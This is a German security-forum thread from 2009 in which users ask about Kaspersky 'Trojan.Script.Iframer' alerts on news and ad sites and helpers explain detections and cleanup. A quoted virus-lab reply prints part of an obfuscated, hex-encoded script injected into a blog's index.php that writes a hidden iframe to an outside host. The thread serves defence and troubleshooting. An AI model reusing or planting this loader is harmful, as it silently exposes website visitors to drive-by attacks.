Hallo liebe Experten!
Ich benutze nun schon seit einiger Zeit KAV 2009 und gerade eben hat er zum 1. Mal was gefunden. Weiß nun gar nicht, ob ich noch was tun muss oder nicht?
War auf der Seite der New York Times wegen des Flugzeugcrashs und erhalte nach dem Aufrufen die o.g. Warnmeldung und eine Sekunde später die Meldung
"Verboten: HEUR: Trojan.Script.Iframer ".
Genauso steht es jetzt auch in den Berichten unter Anti-Virus, erst gefunden dann verboten.
Systemprüfung ergab: "Keinen Fund".
Hat sich die Sache für mich damit erledigt?? Oder muss ich noch was tun?
Vielen Dank im voraus für Eure Hilfe!!!
Gruß
Traveller11
Full Version: HEUR: Trojan.Script.Iframer gefunden
Hi und willkommen im Forum
sieht so aus, als ob KIS es schon blockiert hätte und es nicht auf deinem PC gelandet ist.
Gruß SecurityMK
QUOTE(SecurityMK @ 16.01.2009 15:34) 
Hi und willkommen im Forum
sieht so aus, als ob KIS es schon blockiert hätte und es nicht auf deinem PC gelandet ist.
Gruß SecurityMK
sieht so aus, als ob KIS es schon blockiert hätte und es nicht auf deinem PC gelandet ist.
Gruß SecurityMK
Hallo, bin auch jetzt neu hier wegen diesem Virus.
Bei mir scheint er auf den PC gekommen zu sein. Wie er das erste Mal gefunden wurde, wurde mir von Kaspersky die Option Quarantäne empfohlen, ich habe aber auf löschen geklickt. Kaspersky verschob ihn trotzdem in Quaratäne. Nach 20 min machte ich nochmal einen Scan und ich bekam wieder eine Warnung mit dem gleichen Virus, wurde gleich automatisch in Quarantäne verschoben. Und jetzt hab ich laut Statistik auf einmal 7 Viren gehabt.
Jetzt gab es schon länger keine Meldung mehr.
Hat Kaspersky ihn jetzt neutralisiert oder ist er noch schädlich und was macht dieser Virus?
Vielen Dank für die Hilfe.
Liebe Grüße
MrDynamic
Hallo und willkommen im Forum
wo findet Kaspersky den Virus? Welche Version besitzt du? Stelle bitte ein AVZ-Logfile.
Gruß SecurityMK
Ok, ich habe betreffend diesem Trojaner eine Frage.
Vor einiger Zeit hatte ich ein Blog namens Spadoinkle. Leider wurde ich auf diesem inaktiv, die Seite blieb aber weiterhin übers I-net erreichbar. Doch seit kurzen erhalte ich die Fehlermeldung von Kaspersky Internet-Seucrity 2009, dass sich folgender Trojan HEUR:Trojan.Script.Iframer auf dieser Seite runterlädt.
Ich habe nie Malware oder derartiges Verbreitet, und dass jemand mein Account gehackt hat scheint auch nicht der Fall zu sein. Könnte das vom Anbieter des Spaces kommen?
Vor einiger Zeit hatte ich ein Blog namens Spadoinkle. Leider wurde ich auf diesem inaktiv, die Seite blieb aber weiterhin übers I-net erreichbar. Doch seit kurzen erhalte ich die Fehlermeldung von Kaspersky Internet-Seucrity 2009, dass sich folgender Trojan HEUR:Trojan.Script.Iframer auf dieser Seite runterlädt.
Ich habe nie Malware oder derartiges Verbreitet, und dass jemand mein Account gehackt hat scheint auch nicht der Fall zu sein. Könnte das vom Anbieter des Spaces kommen?
Die Erkennung ist vermutlich auf den "Werbe"-Codeblock ziemlich am Ende des Seitenquelltexts zurückzuführen. Da der Code verschleiert ist, kommt er der Heuristik verdächtig vor.
QUOTE(JanRei @ 17.01.2009 01:24)
Die Erkennung ist vermutlich auf den "Werbe"-Codeblock ziemlich am Ende des Seitenquelltexts zurückzuführen. Da der Code verschleiert ist, kommt er der Heuristik verdächtig vor.
Dass heisst, meine Website verbreitet keinen Trojaner?
Anbei noch die Meldung von Kaspersky.
QUOTE(SecurityMK @ 16.01.2009 21:51)
Hallo und willkommen im Forum
wo findet Kaspersky den Virus? Welche Version besitzt du? Stelle bitte ein AVZ-Logfile.
Gruß SecurityMK
wo findet Kaspersky den Virus? Welche Version besitzt du? Stelle bitte ein AVZ-Logfile.
Gruß SecurityMK
Hi. Ich habe die Version 8.0.0.506 Kaspersky 2009.
Problem hat sich erledigt, hab einen Freeware-Scanner benutzt, der hat mir zusätzlich auch noch eine Adware erkannt, den Kaspersky nicht erkannt hatte. Jetzt bekomm ich auch keinen stastischen Virus mehr hinzu, wenn Kaspersky einen Scan macht.
Danke trotzdem für die Hilfe.
Liebe Grüße
MrDynamic
QUOTE(Spadoinkle @ 16.01.2009 23:54)
Dass heisst, meine Website verbreitet keinen Trojaner?
Momentan würde ich sagen, dass die Seite keinen Trojaner verbreitet. Das Skript erzeugt einen Iframe, welcher die Seite http://vivituscia.com/images/stats.html einbindet. Insofern kann ich die Warnmeldung durchaus nachvollziehen. Eigentlich wollte ich vor dem Antworten bei den Virenanalysten nachfragen, ob das Skript tatsächlich gefährlich ist, habe allerdings bisher keine Antwort erhalten.
Hallo JanRei
Ok, danke erstmals für diese Info. Wäre froh, wenn du es hier reinposten könntest, sobald du Antwort von den Virenanalysten erhalten hast.
Danke undGruss
Spadoinkle
Ok, danke erstmals für diese Info. Wäre froh, wenn du es hier reinposten könntest, sobald du Antwort von den Virenanalysten erhalten hast.
Danke undGruss
Spadoinkle
Das gleiche hatte ich gerade beim Besuch von Winfuture, Web Anti Virus zeigte auch Heur: Trojan.Script.Iframer an und verweist auf tns.adserver.de/SportscheckA-X.js an, Aktion wurde verboten. Steckt da ein echter Virus hinter oder ist es ein Werbeskript,auf das die Heuristik anschlägt?
Spadoinkle:
Ich hoffe, dass die Erkennung mit einem der nächsten Updates entfernt wird.
Freak2001:
Ich habe bei etwas Herumsurfen auf Winfuture keine Wanrmeldung erhalten. Die erwähnte Adresse scheint - derzeit - nicht erreichbar zu sein. Daher kann ich momentan zur Gefährlich des Skriptes nichts sagen. (Du kannst natürlich auch das betreffende Skript oder einen funktionierenden Link darauf an die Virenalysten schicken, sofern du es ausfindig machen kannst.)
Ich hoffe, dass die Erkennung mit einem der nächsten Updates entfernt wird.
Freak2001:
Ich habe bei etwas Herumsurfen auf Winfuture keine Wanrmeldung erhalten. Die erwähnte Adresse scheint - derzeit - nicht erreichbar zu sein. Daher kann ich momentan zur Gefährlich des Skriptes nichts sagen. (Du kannst natürlich auch das betreffende Skript oder einen funktionierenden Link darauf an die Virenalysten schicken, sofern du es ausfindig machen kannst.)
Ne, hab auch nichts mehr angezeigt bekommen. Es passierte ironischerweise zur Newsmeldung des Confickerwurms. Naja hab nochmal Systemprüfung im abgesicherten Modus gemacht und es wurde nichts gefunden. Gehe daher bei mir nicht von einem Virenbefall aus. Zumal ich ja auch nur mit eingeschränkten Rechten surfe.
Hm, auf meiner Seite wird es immer noch angezeigt...
Das hoffe ich wirklich auch...
QUOTE
Spadoinkle:
Ich hoffe, dass die Erkennung mit einem der nächsten Updates entfernt wird.
Ich hoffe, dass die Erkennung mit einem der nächsten Updates entfernt wird.
Das hoffe ich wirklich auch...
@Spadoinkle
Bitte update deine Datenbanken.
Ich bekomme mit aktivierter Heuristik keine Meldung.
Bitte update deine Datenbanken.
Ich bekomme mit aktivierter Heuristik keine Meldung.
Man hat mir geschrieben, die Erkennung würde entfernt. Anscheinend wird das Skript trotzdem noch unter Umständen erkannt. Vielleicht muss ich nochmal nachhaken...
So, jetzt hatte ich mein nächstes Erlebnis auf der Seite der New York Times, Verboten. Trojan-Clicker.HTML.IFrame.abq und moniert wurde die Adresse: t2.adserver01.de/ArcorCJ-Y.js Also bei der Häufigkeit auf seriösen Seite würde ich mal schätzen, dass die Heuristik überreagiert.
Hm, das ist allerdings eine Signaturerkennung. Laut einem Virenanalysten ist sie auch korrekt ("this is not false alarm.")...
Danke JanRei. tja, hab noch mal im abgesicherten Modus überprüft und das ergebnis war negativ, web anti-virus hat wohl gut geblockt. Mmh, dann ist man scheinbar auch nicht mehr auf seriösen Seiten ansatzweise sicher, Anti-Banner einschalten würde wohl nichts bringen, oder? Ansonsten surfe ich ja schon mit eingeschränkten Rechten, Router mit firewall, Betriebssystem auf dem neuesten Stand.
Hmmm ....
Hello.
This is not false alarm.
New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.
Trojan-Downloader.JS.Iframe.aem
Hello.
This is not false alarm.
New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.
Trojan-Downloader.JS.Iframe.aem
Beziehst du dich auf mein Posting?
Nein, das war die Antwort aus dem Virenlabor. Offenbar gefällt denen ein Skript nicht, das von einigen Websites benutzt wird.
@ JanRei & Spadoinkle
Kaspersky Lab ist sich anscheinend sicher, dass es sich um einen schädlichen Code handelt.
Ich habe sicherheitshalber noch ein Virenlabor von einem anderen Unternehmen eingeschaldet. Dort wurde ebenfalls "JS/Iframe.aem" bestätigt.
Hast du das Script selbst gebastelt?
Kaspersky Lab ist sich anscheinend sicher, dass es sich um einen schädlichen Code handelt.
Ich habe sicherheitshalber noch ein Virenlabor von einem anderen Unternehmen eingeschaldet. Dort wurde ebenfalls "JS/Iframe.aem" bestätigt.
Hast du das Script selbst gebastelt?
So, hab jetzt noch mal mit neuen Signaturen durchsuchen lassen mit negativen Ergebnis, gehe jetzt mal davon aus das KIS Web-Anti Virus den Trojaner geblockt hat. Oder mach ich da einen Denkfehler?
QUOTE(bluex @ 23.01.2009 16:20)
@ JanRei & Spadoinkle
Kaspersky Lab ist sich anscheinend sicher, dass es sich um einen schädlichen Code handelt.
Ich habe sicherheitshalber noch ein Virenlabor von einem anderen Unternehmen eingeschaldet. Dort wurde ebenfalls "JS/Iframe.aem" bestätigt.
Hast du das Script selbst gebastelt?
Kaspersky Lab ist sich anscheinend sicher, dass es sich um einen schädlichen Code handelt.
Ich habe sicherheitshalber noch ein Virenlabor von einem anderen Unternehmen eingeschaldet. Dort wurde ebenfalls "JS/Iframe.aem" bestätigt.
Hast du das Script selbst gebastelt?
Nein, ich habe überhaupt das wissen hierfür gar nicht. Wirklich nicht.
Wie kann es sein, dass so ein schädliches Script auf meiner Seite landet?
Anders gesagt, wie gehe ich nun am besten vor? Ich möchte keinen Trojaner verbreiten!
QUOTE(Freak2001 @ 23.01.2009 15:12)
So, hab jetzt noch mal mit neuen Signaturen durchsuchen lassen mit negativen Ergebnis, gehe jetzt mal davon aus das KIS Web-Anti Virus den Trojaner geblockt hat. Oder mach ich da einen Denkfehler?
Wenn du nicht weiter geklickt hast, wurde er vermutlich geblockt, ja.
QUOTE(Spadoinkle @ 23.01.2009 15:42)
Nein, ich habe überhaupt das wissen hierfür gar nicht. Wirklich nicht.
Wie kann es sein, dass so ein schädliches Script auf meiner Seite landet?
Anders gesagt, wie gehe ich nun am besten vor? Ich möchte keinen Trojaner verbreiten!
Wie kann es sein, dass so ein schädliches Script auf meiner Seite landet?
Anders gesagt, wie gehe ich nun am besten vor? Ich möchte keinen Trojaner verbreiten!
Naja, so schädlich ist es dann doch wieder nicht.
Antwort von einem anderen Virenlabor:
I identified a packer, witch can contain malicious code.
In this case I decrypted the packed data, which points a 404 situation, but yes, this site ("hxxp://www.spadoinkle.ch") contains a script, which injects an iframe
into the document (but its not harmful, just can be).
QUOTE(bluex @ 23.01.2009 17:01)
Wenn du nicht weiter geklickt hast, wurde er vermutlich geblockt, ja.
War ne Nachrichtenseite der New York Times weiter klicken ging auch nicht. Die Seite hat geladen, bis auf das geblockte Element. Hat aber was gedauert bis ich gemerkt habe, dass die Ny Times seite betroffen war und den Tab geschlossen habe.
Hallo
Habe heute noch die Email von Kaspersky erhalten, worin es genau um diese Meldung gegangen ist.
Anschliessend habe ich gemäss Anleitung in der Email einen Report an Kaspersky geschickt. Erhalten habe ich folgende Antwort:
Dies betrifft meine Seite Spadoinkle (bitte nicht draufklicken: www.spadoinkle.ch).
Nun möchte ich dieses Script entfernen. Dies sollte ja über WEB-FTP gehen, oder? Wenn ja, wie kann ich herausfinden wie diese Datei heisst, in der das Script versteckt ist?
Danke für eure Antwort!
Habe heute noch die Email von Kaspersky erhalten, worin es genau um diese Meldung gegangen ist.
Anschliessend habe ich gemäss Anleitung in der Email einen Report an Kaspersky geschickt. Erhalten habe ich folgende Antwort:
QUOTE
Hello
On this page there is a malicious obfuscated script.
Here is is a part of it:
On this page there is a malicious obfuscated script.
Here is is a part of it:
CODE
function m4857aa739d4f5(m4857aa739d8ed)
{
var m4857aa739e4d4=2
var m4857aa739dce4=''
m4857aa739ecc3=String.fromCharCode
for (m4857aa739e0dd=0; m4857aa739e0dd<m4857aa739d8ed.length; m4857aa739e0dd+=m4857aa739e4d4)
{
m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))))
}
return m4857aa739dce4
}
var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661722069
3D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D6528276
96672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D65
6E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E6
46973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D
2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C3529292
0262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368
696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A6966282
16D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536
362537322536312536642536352532302536652536312536642536352533642536332533312532302
537332537322536332533642532372536382537342537342537302533612532662532662537362536
392537362536392537342537352537332536332536392536312532652536332536662536642532662
536392536642536312536372536352537332532662537332537342536312537342537332532652536
382537342536642536632533662532372532622534642536312537342536382532652537322536662
537352536652536342532382534642536312537342536382532652537322536312536652536342536
662536642532382532392532612533312533362533392533312533322533382532392532622532372
533362536362536352533392536352533382536342533302536312533312533362532372532302537
372536392536342537342536382533642533372533382533332532302536382536352536392536372
536382537342533642533322533312533362532302537332537342537392536632536352533642532
372536342536392537332537302536632536312537392533612532302536652536662536652536352
532372533652533632532662536392536362537322536312536642536352533652729293B7D766172
206D7969613D747275653B3C2F7363726970743E'
document.write(m4857aa739d4f5(m4857aa739f0bb))
{
var m4857aa739e4d4=2
var m4857aa739dce4=''
m4857aa739ecc3=String.fromCharCode
for (m4857aa739e0dd=0; m4857aa739e0dd<m4857aa739d8ed.length; m4857aa739e0dd+=m4857aa739e4d4)
{
m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))))
}
return m4857aa739dce4
}
var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661722069
3D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D6528276
96672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D65
6E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E6
46973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D
2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C3529292
0262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368
696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A6966282
16D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536
362537322536312536642536352532302536652536312536642536352533642536332533312532302
537332537322536332533642532372536382537342537342537302533612532662532662537362536
392537362536392537342537352537332536332536392536312532652536332536662536642532662
536392536642536312536372536352537332532662537332537342536312537342537332532652536
382537342536642536632533662532372532622534642536312537342536382532652537322536662
537352536652536342532382534642536312537342536382532652537322536312536652536342536
662536642532382532392532612533312533362533392533312533322533382532392532622532372
533362536362536352533392536352533382536342533302536312533312533362532372532302537
372536392536342537342536382533642533372533382533332532302536382536352536392536372
536382537342533642533322533312533362532302537332537342537392536632536352533642532
372536342536392537332537302536632536312537392533612532302536652536662536652536352
532372533652533632532662536392536362537322536312536642536352533652729293B7D766172
206D7969613D747275653B3C2F7363726970743E'
document.write(m4857aa739d4f5(m4857aa739f0bb))
Dies betrifft meine Seite Spadoinkle (bitte nicht draufklicken: www.spadoinkle.ch).
Nun möchte ich dieses Script entfernen. Dies sollte ja über WEB-FTP gehen, oder? Wenn ja, wie kann ich herausfinden wie diese Datei heisst, in der das Script versteckt ist?
Danke für eure Antwort!
Im Prinzip müssten die Dateien dazu durchsucht werden. Falls der FTP-Zugriff keine Suchfunktion anbietet, wäre es dazu vielleicht sinnvoll, die Dateien herunterzuladen. Denn auf der Festplatte können sie eventuell einfacher durchsucht werden. Ich würde die Suche bei der index.php beginnen.
Ok, habe das Script gefunden und entfernt.
War immer in der index.php. Aber eine wichtig Frage:
Wie kann solch ein Script auf meine Seite? Hat sich einer Hacker mein Passwort erhackt oder können Sie auch auf andere weise solche Scripte auf Seiten einbinden?
Kann es sein dass ich durch Malware das Passwort für meine Seite geholt werden konnte?
Danke für die Auskunft.
War immer in der index.php. Aber eine wichtig Frage:
Wie kann solch ein Script auf meine Seite? Hat sich einer Hacker mein Passwort erhackt oder können Sie auch auf andere weise solche Scripte auf Seiten einbinden?
Kann es sein dass ich durch Malware das Passwort für meine Seite geholt werden konnte?
Danke für die Auskunft.
Sollte das Skript tatsächlich von einer unbefugten Person eingebaut worden sein, kommt meiner Meinung nach vor allem das Ausnutzen einer Sicherheitslücke der Webseite oder das Ausspähen/Hacken des Passworts in Betracht.
QUOTE(JanRei @ 7.02.2009 01:28)
Sollte das Skript tatsächlich von einer unbefugten Person eingebaut worden sein, kommt meiner Meinung nach vor allem das Ausnutzen einer Sicherheitslücke der Webseite oder das Ausspähen/Hacken des Passworts in Betracht.
Interessant. dass jemand mein Passwort erhackt/ausgespäht hat, kann ich mir weniger vorstellen. Ich hatte zwar vor einiger Zeit eine Infektion, dies ist aber mittlerweile vollständig behoben und mein Rechner ist desinfiziert. Hier würde ich eher zu einer Sicherheitslücke tendieren. In diesem Fall sollte aber das Script nur in er index.php der genannten Seite sein und nicht auf allen index.php Dateien auf meinem Webspace; liege ich mit dieser Aussage richtig?
Und noch meine wichtigste Frage: Wie lässt sich so etwas verhindern?
Ich entschuldige mich für diese vielen, teils sehr blöden Fragen. Ich bin aber auf diesem Gebiet nicht sehr versiert und möchte mich daher noch infomieren.
Das Ausnutzen von Sicherheitslücken lässt sich vor allem durch Verwenden der jeweils aktuellen Version von eventuell eingesetzten Skripte (also etwa Wordpress etc.) erschweren. Welche Dateien von einer Lücke betroffen sein können, hängt unter anderem von der Lücke ab.
Bei Recherchen im Internet bin ich übrigens darauf gestoßen, dass ähnliche Skripte anscheinend schon häufiger unerwartet auf Webseiten aufgetaucht sind (siehe beispielsweise hier).
Bei Recherchen im Internet bin ich übrigens darauf gestoßen, dass ähnliche Skripte anscheinend schon häufiger unerwartet auf Webseiten aufgetaucht sind (siehe beispielsweise hier).
Ok, vielen Dank für die Infos JanRei. Du hast mir wirklich sehr geholfen.
Schlimme Sache sowas... Aber danke =)
Schlimme Sache sowas... Aber danke =)
hi hab heute auf einer seite diesen virus oder alarm bekommen kaspersky schreibt zwar das er geblockt wured hab auch eine wenig gelesen hier nur bin ich mir jetzt nicht sicher hat er den virus geblockt ist er gefährlich oder muss ich was unternehmen kann mir bitte wer helfen wäre sehr dankbar für jede antwort und hilfe poste mal hier den namen nach einer durchsuchung hat er nichts gefunden
09.02.2009 14:41:27 Gefunden Virus HEUR:Trojan.Script.Iframer Hoch Möglich Internet Explorer ://layer-ad.org/framead_klick.php?uri=...GF5ZXIuaHRtbA==
mfg
roli
09.02.2009 14:41:27 Gefunden Virus HEUR:Trojan.Script.Iframer Hoch Möglich Internet Explorer ://layer-ad.org/framead_klick.php?uri=...GF5ZXIuaHRtbA==
mfg
roli
Diese Seite bindet ebenfalls einen Iframe mit Hilfe eines (verschleierten) Javascripts ein. Dies kann potentiell gefährlich sein und wird daher gemeldet, dient aber in diesem Fall aber wahrscheinlich nur Werbezwecken.
watt neues von dem teil :
Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich
Beim Zugriff auf die URL-Adresse:
http://www.viruslist.com/ru/search?VN=
HEUR:Trojan.Script.Iframer
sind folgende Fehler aufgetreten:
Das angeforderte Objekt ist mit folgenden Viren INFIZIERT: HEUR:Trojan.Script.Iframer
Bitte wenden Sie sich an Ihren Provider, wenn Sie diese Meldung für einen Irrtum halten.
Diese Meldung wurde erstellt:
Mon Oct 26 12:37:56 2009
Kaspersky Internet Security 2009
das kam auf der seite www.project-world-war.com
und folgendes fand kaspersky beim anschliessenden system scan :-)
Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich
Beim Zugriff auf die URL-Adresse:
http://www.viruslist.com/ru/search?VN=
HEUR:Trojan.Script.Iframer
sind folgende Fehler aufgetreten:
Das angeforderte Objekt ist mit folgenden Viren INFIZIERT: HEUR:Trojan.Script.Iframer
Bitte wenden Sie sich an Ihren Provider, wenn Sie diese Meldung für einen Irrtum halten.
Diese Meldung wurde erstellt:
Mon Oct 26 12:37:56 2009
Kaspersky Internet Security 2009
das kam auf der seite www.project-world-war.com
und folgendes fand kaspersky beim anschliessenden system scan :-)
Hallo und Willkommen im Forum,
es sieht so aus, als hat es in diesem Zusammenhang ein vorübergehendes Problem gegeben. Überprüfe bitte, ob die Dateien nach einem Update der Anti-Viren-Datenbanken weiterhin erkannt werden. Sollte dies der Fall sein, sende sie zur Analyse an Kaspersky.
es sieht so aus, als hat es in diesem Zusammenhang ein vorübergehendes Problem gegeben. Überprüfe bitte, ob die Dateien nach einem Update der Anti-Viren-Datenbanken weiterhin erkannt werden. Sollte dies der Fall sein, sende sie zur Analyse an Kaspersky.
Hallo zusammen,
mein KIS 2010 hat gestern angefangen, jede Internetseite (sowohl bei IE als auch Firefox) wegen dem "heur:trojan.script.iframer" zu verbieten. Beim Virenscan meiner Laufwerke hat er dann bei jeder dritten Datei dieselbe Meldung gebracht, bis er dann bei 39% stehen geblieben ist und nen Neustart brauchte. Nach dem Neustart hat er dann bis 100% nix mehr gefunden, sodass ich dachte, die Sache wäre gegessen. Heute hab ich dasselbe Problem wieder, jede Seite wird von KIS verboten. Hat jemand ne Idee?
mein KIS 2010 hat gestern angefangen, jede Internetseite (sowohl bei IE als auch Firefox) wegen dem "heur:trojan.script.iframer" zu verbieten. Beim Virenscan meiner Laufwerke hat er dann bei jeder dritten Datei dieselbe Meldung gebracht, bis er dann bei 39% stehen geblieben ist und nen Neustart brauchte. Nach dem Neustart hat er dann bis 100% nix mehr gefunden, sodass ich dachte, die Sache wäre gegessen. Heute hab ich dasselbe Problem wieder, jede Seite wird von KIS verboten. Hat jemand ne Idee?
Hallo Leute,
ich bin neu hier und bitte daher um etwas Nachsicht, wenn ich nicht gleich alles verstehe. Es ist so, daß ich heute auch wieder diese Meldung mit dem HEUR. Script IFramer hatte. Der Kaspersky hat mir im Bericht geschrieben, daß er ihn gefunden, aber geblockt hat. Wenn er aber doch geblockt ist, wie kann man ihn dann trotzdem an das Viren-Labor schicken? Ich traue mich nicht, da er doch dann beim Anklicken wieder aktiviert wird, oder? So ganz verstehe ich das noch nicht. Ich habe ein Screenshot gemacht mit der genauen Bezeichnung. Könnte ich Dir Dir den Link mal versuchen per PM zu schicken, JanRei? Ich wüßte nämlich auch gerne mal, ob die Gefahr gebannt ist oder nicht, da man laut Kasperky 2010 nicht erkennen kann, ob er jetzt noch da ist oder nicht. Auf jeden Fall hat er mir aber beim Scannen auch gesagt: Verboten. Was ja schonmal gut klingt.
Der Name ist immer: adserver.adtech.de und dann natürlich der Rest vom Link. Vielleicht könnt Ihr schonmal damit etwas anfangen.
Zur Zeit lasse ich den Kaspersky aber nochmal durchlaufen und bin mal gespannt, ob er ihn nochmal findet oder nicht. Falls nicht, ist dann alles ok?
Schonmal ganz lieben Dank für Eure Antwort!
LG
Michael
ich bin neu hier und bitte daher um etwas Nachsicht, wenn ich nicht gleich alles verstehe. Es ist so, daß ich heute auch wieder diese Meldung mit dem HEUR. Script IFramer hatte. Der Kaspersky hat mir im Bericht geschrieben, daß er ihn gefunden, aber geblockt hat. Wenn er aber doch geblockt ist, wie kann man ihn dann trotzdem an das Viren-Labor schicken? Ich traue mich nicht, da er doch dann beim Anklicken wieder aktiviert wird, oder? So ganz verstehe ich das noch nicht. Ich habe ein Screenshot gemacht mit der genauen Bezeichnung. Könnte ich Dir Dir den Link mal versuchen per PM zu schicken, JanRei? Ich wüßte nämlich auch gerne mal, ob die Gefahr gebannt ist oder nicht, da man laut Kasperky 2010 nicht erkennen kann, ob er jetzt noch da ist oder nicht. Auf jeden Fall hat er mir aber beim Scannen auch gesagt: Verboten. Was ja schonmal gut klingt.
Der Name ist immer: adserver.adtech.de und dann natürlich der Rest vom Link. Vielleicht könnt Ihr schonmal damit etwas anfangen.
Zur Zeit lasse ich den Kaspersky aber nochmal durchlaufen und bin mal gespannt, ob er ihn nochmal findet oder nicht. Falls nicht, ist dann alles ok?
Schonmal ganz lieben Dank für Eure Antwort!
LG
Michael
Hallo und Willkommen im Forum,
man kann in der Regel auch einen Link zu einer Webseite/Datei an das Virenlabor senden, dazu einfach die im Warnfenster/Bericht erwähnte Internetadresse in die Nachricht einfügen. Bei dynamischen Webseiten sollte man jedoch beachten, dass die Virenalysten möglicherweise eine andere Seite zu sehen bekommen wie man selbst. Daher versuche ich normalerweise, das konkret erkannte Skript als Anhang einzusenden.
Du kannst mir gerne den Link schicken, ich werde es mir dann ansehen. adserver.adtech.de spricht allerdings zunächst dafür, dass es sich um ein eigentliches ungefährliches Werbeskript handelt.
man kann in der Regel auch einen Link zu einer Webseite/Datei an das Virenlabor senden, dazu einfach die im Warnfenster/Bericht erwähnte Internetadresse in die Nachricht einfügen. Bei dynamischen Webseiten sollte man jedoch beachten, dass die Virenalysten möglicherweise eine andere Seite zu sehen bekommen wie man selbst. Daher versuche ich normalerweise, das konkret erkannte Skript als Anhang einzusenden.
Du kannst mir gerne den Link schicken, ich werde es mir dann ansehen. adserver.adtech.de spricht allerdings zunächst dafür, dass es sich um ein eigentliches ungefährliches Werbeskript handelt.
Erstmal lieben Dank für Deine nette Begrüßung udn Deine schnelle Antwort!
Das klingt schonmal gut, daß es etwas Ungefährliches ist. Du sagst, man könnte einfach den Link schicken. Aber man kann ihn doch gar nicht so ohne Weiteres kopieren oder? Ich meine, eh man den Link ja von Hand geschrieben hat, ist ja Weihnachten.
Da muß es doch eine Möglichkeit geben, den zu kopieren, oder habe ich etwas nicht verstanden, was Du mir erklärt hast?
Ich versuche Dir mal irgendwie den Link zu schicken. Das wäre mir auf jeden Fall am Liebsten. Aber sag mir bitte, wie ich den kopiert bekomme. Weil, wenn ich den mit rechts anklicke, kommt nichts. Nur: Aus der Liste löschen oder Liste leeren.
Das klingt schonmal gut, daß es etwas Ungefährliches ist. Du sagst, man könnte einfach den Link schicken. Aber man kann ihn doch gar nicht so ohne Weiteres kopieren oder? Ich meine, eh man den Link ja von Hand geschrieben hat, ist ja Weihnachten.
Da muß es doch eine Möglichkeit geben, den zu kopieren, oder habe ich etwas nicht verstanden, was Du mir erklärt hast? Ich versuche Dir mal irgendwie den Link zu schicken. Das wäre mir auf jeden Fall am Liebsten. Aber sag mir bitte, wie ich den kopiert bekomme. Weil, wenn ich den mit rechts anklicke, kommt nichts. Nur: Aus der Liste löschen oder Liste leeren.
Man kann komplette Berichtszeilen kopieren, indem man die entsprechende Berichtszeile markiert und dann die Tastenkombination Strg+C verwendet. Mit Strg+C kann sie dann in das Textfeld einfügt werden.
Bitte versuche mir die Adresse auf diese Weise zu schicken, da der Screenshot nicht bei mir angekommen ist.
Bitte versuche mir die Adresse auf diese Weise zu schicken, da der Screenshot nicht bei mir angekommen ist.
Danke für Deinen Tipp! Das wußte ich gar nicht! Und wieder was gelernt! Den Trick muß man erstmal wissen!
So, jetzt müßte der Link aber da sein. Hoffe ich jedenfalls!
So, jetzt müßte der Link aber da sein. Hoffe ich jedenfalls!
QUOTE(JanRei @ 30.10.2009 21:36)
Man kann komplette Berichtszeilen kopieren, indem man die entsprechende Berichtszeile markiert und dann die Tastenkombination Strg+C verwendet. Mit Strg+C kann sie dann in das Textfeld einfügt werden.
Bitte versuche mir die Adresse auf diese Weise zu schicken, da der Screenshot nicht bei mir angekommen ist.
Bitte versuche mir die Adresse auf diese Weise zu schicken, da der Screenshot nicht bei mir angekommen ist.
JanRei meinte sicher: Mit Strg+V kann sie dann in das Textfeld einfügt werden.
Möglich, aber es ging auch mit Strg+C. Zum GlücK! Aber, danke TwinBit!
Oh ja, danke für die Verbesserung, TwinBit.
Ich habe den Link erhalten. Das entsprechende Skript bindet Werbung per Iframe ein und ist damit in der Tat eigentlich harmlos. Es verursacht bei mir bei aber keine Erkennung durch KIS.
Ich habe den Link erhalten. Das entsprechende Skript bindet Werbung per Iframe ein und ist damit in der Tat eigentlich harmlos. Es verursacht bei mir bei aber keine Erkennung durch KIS.
Ah gut, dann bin ich ja beruhigt., wenn er harmlos ist. Danke für die schnelle Hilfe, JanRei! Und mal ein großes Lob an dieses Forum hier, daß man die verdächtigten Links schicken kann und Ihr sie Euch umgehend anschaut! Kompliment! So ist sicher nicht jedes Forum!
Ich weiß auch nicht, warum es bei mir angeschlagen hat. Die ganze Zeit war auch nichts, erst heute mal wieder. 2x hatte ich es schon. Aber das war im August. Aber zum GLück auch geblockt? Kann es auch damit zusammenhängen, wei die Webseiten immer mehr von dieser blöden Werbung drin haben? Das ist ja wirklich furchtbar. Und ich geh nur noch auf ganz seriöse Seiten.
Aber kann ich davon ausgehen, daß Kaspersky ihn geblockt hat? Denn auch wenn er harmlos ist, will ich ihn ja nicht auf meinem System haben!
Ich weiß auch nicht, warum es bei mir angeschlagen hat. Die ganze Zeit war auch nichts, erst heute mal wieder. 2x hatte ich es schon. Aber das war im August. Aber zum GLück auch geblockt? Kann es auch damit zusammenhängen, wei die Webseiten immer mehr von dieser blöden Werbung drin haben? Das ist ja wirklich furchtbar. Und ich geh nur noch auf ganz seriöse Seiten.
